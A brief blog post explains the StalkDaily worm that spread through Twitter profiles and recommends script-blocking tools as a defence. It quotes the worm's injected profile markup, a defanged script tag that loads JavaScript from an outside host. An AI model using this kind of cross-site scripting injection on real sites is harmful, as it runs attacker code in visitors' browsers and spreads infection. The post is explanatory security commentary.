Twitter Worm

DCortesi has posted a nice summary of a script exploit in Twitter

I knew something was up. Looking at one of the infected profiles I saw a link to the StalkDaily site, but then also some script tags. These typically aren’t allowed as part of a profile URL and looked suspicious:

<a href="http://www.stalkdaily.com">
<script src="hxxp://mikeyylolz.uuuq.com/x.js%3E">
</script></a>

Twitter allowed encoding in a profile’s URL field, so the malicious JavaScript would run as soon as someone viewed a compromised twitter profile page. Then anyone who looked at your page would be infected as well, and so forth.

An excellent way to prevent this is with “noscript” or similar utilities that require you to whitelist javascript, as DCortesi mentions. You would be prompted to allow a uuuq.com script, at which point you hopefully would say no and realize the twitter page is compromised. This is not foolproof, of course, as many would not realize that uuuq.com is suspicious. Another method of prevention is to avoid using Twitter. Haha.

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.